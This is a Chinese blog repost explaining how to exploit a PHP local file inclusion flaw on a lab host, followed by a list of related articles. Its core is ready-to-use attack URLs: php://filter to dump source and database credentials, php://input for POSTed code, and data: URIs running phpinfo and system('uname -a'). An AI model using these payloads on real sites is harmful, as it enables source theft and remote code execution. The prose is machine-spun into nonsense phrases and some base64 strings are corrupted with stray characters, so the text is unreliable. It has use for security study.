lfi读取php,php LFI读php文件源码以及直接post webshell

最新推荐文章于 2022-01-23 16:56:49 发布
最新推荐文章于 2022-01-23 16:56:49 发布
阅读量471 收藏 1
点赞数
文章标签: lfi读取php

php LFI读php文件源码以及间接post 网站shell

假如如下一个场景

(1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包孕LFI漏洞)

(2) 然而你不有中央能够upload你的网站shell代码

(三) LFI只能读取到非php文件的源码(由于无奈解析履行 只能被爆菊花)

(4) 假如你能读取到config.php之类文件 或批准以间接拿到数据库账号远程入侵出来

【现在的标题问题是】?LFI如何读取到php文件的源码?

因而给大家做个演示?假如我正常用LFI去读/sqli/db.php文件?是无奈读取它的源码?它会被当做php文件被履行

Default

http://vulnerable/fileincl/example1.php?page=../sqli/db.php

http://vulnerable/fileincl/example1.php?page=../sqli/db.php

d119d121d85aaa9769b14a33a90082da.png

然而假如我用老外文章里说提到的口头?就能把指定php文件的源码以base64方式编码并被阐扬阐发出来

Default

http://vulnerable/fileincl/example1.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.php

http://vulnerable/fileincl/example1.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.php

73c0998b4aab5b57a185b95d3533de96.png

/sqli/db.php源码base64编码后的模式阐扬阐发如下

Default

PD9waHAgCiAgJGxuayA9IG15c三FsX2Nvbm5lY三QoImxvY2FsaG9zdCIsICJwZW50ZXN0ZXJsYWIiLCAicGVudGVzdGVybGFiIik七CiAgJGRiID0gbXlzcWxfc2VsZWN0X2RiKCdleGVyY2lzZXMnLCAkbG5rKTsKPz4K

PD9waHAgCiAgJGxuayA9IG15c三FsX2Nvbm5lY三QoImxvY2FsaG9zdCIsICJwZW50ZXN0ZXJsYWIiLCAicGVudGVzdGVybGFiIik七CiAgJGRiID0gbXlzcWxfc2VsZWN0X2RiKCdleGVyY2lzZXMnLCAkbG5rKTsKPz4K

尔后我们再去停止base64解码?解码后/sqli/db.php文件的源码一览无遗

f0b076032dd66934297276648fca674b.png

看下去彷佛很锋利的容貌2三0;2三0;?然而?=_,=||~?再继续看下文~

奸通奸骗*奸通奸骗*奸通奸骗*奸通奸骗*奸通奸骗?我是险峻的分割线?奸通奸骗*奸通奸骗*奸通奸骗*奸通奸骗*奸通奸骗

【身手】php://input?和?data:

php://input?概况能够参考

http://zerofreak.blogspot.jp/2012/04/lfi-exploitation-via-phpinput-shelling.html

【前提】在allow_url_include?=?On?且?PHP?>=?5.2.0

【优势】间接POST?php代码并履行

【鸡肋】在allow_url_include?=?On?传说中就能够间接RFI了?不过不有vps的童鞋能够多么玩斗劲任意

在上面提到的同一个LFI漏洞点?我们又要来爆它一次菊花

Default

http://vulnerable/fileincl/example1.php?page=intro.php

http://vulnerable/fileincl/example1.php?page=intro.php

访问如下URL并用burp间接批改HTTP包?追加php命令代码

Default

http://vulnerable/fileincl/example1.php?page=php://input

http://vulnerable/fileincl/example1.php?page=php://input

e85c57d33cbfdf216fd3d514fbfa74d5.png

尔后某君再一次被爆菊?>_

02cc45f2156d09f986dd04b817bf2840.png

再换几种姿态继续??data:?的方式

Default

http://vulnerable/fileincl/example1.php?page=data://text/plain;base64,PD9waHBpbmZvKCk七Lyo=

http://vulnerable/fileincl/example1.php?page=data:;base64,PD9waHBpbmZvKCk七Lyo=

http://vulnerable/fileincl/example1.php?page=data:text/plain,<?php system("uname -a");?>

12三

http://vulnerable/fileincl/example1.php?page=data://text/plain;base64,PD9waHBpbmZvKCk七Lyo=   http://vulnerable/fileincl/example1.php?page=data:;base64,PD9waHBpbmZvKCk七Lyo=  http://vulnerable/fileincl/example1.php?page=data:text/plain,<?php system("uname -a");?>

ad6adefd764e1f91c3f43e0990e2f3c3.png

[via@casperkid / 2cto]

圣君阡陌
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php LFI漏洞的一些收集
u011500307的专栏
06-08 3256
1. LFI全称是local file include,先举个最简单的例子来说明下:
toxin:LFI(本地文件包含)漏洞利用工具
05-30
Toxin 是一个 LFI(本地文件包含)/日志污染利用工具。 介绍 Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会...
渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机
hljzzj的博客
01-23 6838
phpinfo文件上传+LFI(文件包含)获取shell,suid提权
php Wrapper LFI,利用PHP代码实现LFI2RCE
weixin_34213766的博客
03-16 174
在HIZ杂志中所用到的函数是passthru(http://cn2.php.net/passthru),主要还是为了实现一句话木马,当然也可使用exec 以及system等函数,三者之间的区别可参考《PHP 执行系统外部命令 system() exec() passthru()》:http://hi.baidu.com/cgeek/blog/item/fb9a1e4cd1bf1afdd62afc7...
LFI本地包含漏洞介绍php
03-24
LFI本地包含漏洞介绍php的 这个是最新的2011年最新公布的。
awd-watchbird:适用于AWD的功能强大PHP WAF
03-19
易于配置(单文件,无需加载外部js / css)可以随时开启/关闭某项防御基本防御:数据库注入(SQL注入)文件上传(上传)文件包含(lfi)标志关键字PHP反序列化(反序列化)命令执行(rce)分布式拒绝服务攻击(ddos...
k4l0ng_WAF:broute通过PHP使用AWD检测WAF
05-10
php编写的通防K4l0nG_WAF几乎能...抓取流量若AWD环境中没有权限部署流量拦截工具,可将此waf更名为别人的webshell文件名,从而获取他的webshell连接流量使用若此文件在linux下执行,请保证此文件啊具有可执行权限可自行
用于Laravel的Web应用程序防火墙(WAF)软件包-PHP开发
05-27
用于Laravel的Web应用程序防火墙(WAF)软件包该软件包旨在保护您的Laravel应用程序免受各种类型的攻击,例如XSS,SQLi,RFI,LFI,用户代理等。 它还会阻止重复的Laravel Web应用程序防火墙(WAF)程序包。此程序包...
php Wrapper LFI,PHP安全之LFI漏洞GetShell方法大阅兵
weixin_42338883的博客
03-16 255
Author:LengF Blog:www.81sec.com0x00 题外话关于PHPLFI(Local File Include,本地文件包含)漏洞很多朋友都不是很熟悉,其实网络上有很多这方面的资料,特别说国外的paper。虽然很多资料讲得不是很详细,但是大家都懒得去测试,本文就给大家总结下,并讲述完整的利用方法。[separator]0x01 LFI的GETSHELL思路在讲述如何利用...
phpLFI
weixin_34124577的博客
12-26 187
LFI(本地包含) 那么我们就直接实例吧。Test1.php <?php include("./test/".$test); ?>测试代码:http://localhost/test1.php?test=../test2.txt Test2.php <?php include("./test/".$test.".php"); ?>测试代码:ht...
php LFIphp文件源码以及直接webshell
eT48_Sec
01-05 1149
小菜无意中看到大牛的一篇文章,看后觉得很受益,所以就转载过来了。 之前只知道“include”语句是包含并运行指定文件,遇到的话也只是找上传点然后getshell。 看来这篇文章后,才知道还可以读取php文件的源代码,这样的话,就可以读取网站的配置文件了。 而且在allow_url_include=On 的情况下,还可以直接执行php代码。 原文:http://hi.baidu.com/c
php LFI
weixin_33737134的博客
01-09 92
2019独角兽企业重金招聘Python工程师标准>>> ...
[LFI]Phpinfo本地文件包含漏洞环境搭建分析
weixin_34380948的博客
08-29 469
0x00 本地文件包含漏洞即网站未对用户可控变量进行控制,导致用户可以控制包含变量。 0x01 参考wooyun上的教程中遇到问题如下: Can not connect to the docker deamon 权限不够,docker未提示,指令前加sudo sudo docker run –rm -p “8901:80” janes/lfi_phpinfo 8901为本机端口...
LFI(本地文件包含)获取Webshell
weixin_30734435的博客
10-11 448
本地文件包含在Web渗透测试中时不时的会遇到。之前遇到本地文件包含的时候,最多就是证明一下:比如包含“/etc/passwd”。有利用本地文件包含来进行Getshell的,之前是略有耳闻的,这两天看相关文章的时候,好奇一下自己搭环境实现了一遍。很老的技术了,看老外在2011年就写了相关文章,不过文章中的Python程序是有问题的。我会在最后把自己修改的代码分享出来。 ...
修改PHP源代码解决Nginx下WebShell的问题
Richie Huang的专栏
07-26 1318
Nginx / Lighttpd + PHP FastCGI的方式正在被越来越多的网站应用,其中让需要虚拟主机支持的用户最烦心的一件事情莫过于站点权限隔离。 目前无论是spawn-cgi或者是php-fpm的方式,都无法动态转变执行用户。尽管可以通过给不同网站以不同的用户身份执行FastCGI,但这也同样失去了FastCGI统一管理的优势,需要为每个网站保留足够的处理进程而不是整体规划。 Google搜之有两个比较广为流传的方法,其中最完美的莫过于直接修改PHP源代码,对打开目录进行鉴权(搜出来的资料最早
桂林老兵php,中间件解析漏洞
weixin_39814393的博客
03-24 302
IISIIS解析漏洞IIS 6.0解析利用方法有两种:1:文件解析在IIS6.0下,分号,冒号后面的不被解析,也就是说wooyun.asp;123.jpg会被服务器看成是wooyun.asp以下格式也会被解析:*.asa、*.asp,*.cer;*.cdx2:目录解析当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。3.默认解析:在默认Fast-CGI...
php文件源码,php文件写实例程序
weixin_28595749的博客
03-19 98
php文件我们最常用的就是用fgets,readfile或直接使用file_get_contents() 函数把整个文件入一个字符串中,写文件就比较单一了我们常用用fopen与fwrite来实现文件写入。PHP如何文件file_get_contents() 函数把整个文件入一个字符串中。例子代码如下复制代码输出:This is a test file with test text.在P...
index.php?file=show.php
最新发布
05-31
攻击者可以通过修改 file 参数的值来访问其他敏感文件,甚至可以直接在 URL 中输入文件的绝对路径来读取任意文件。 为了防止这种漏洞,可以对输入进行严格的过滤和验证,并使用白名单来限制可包含的文件。可以使用 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值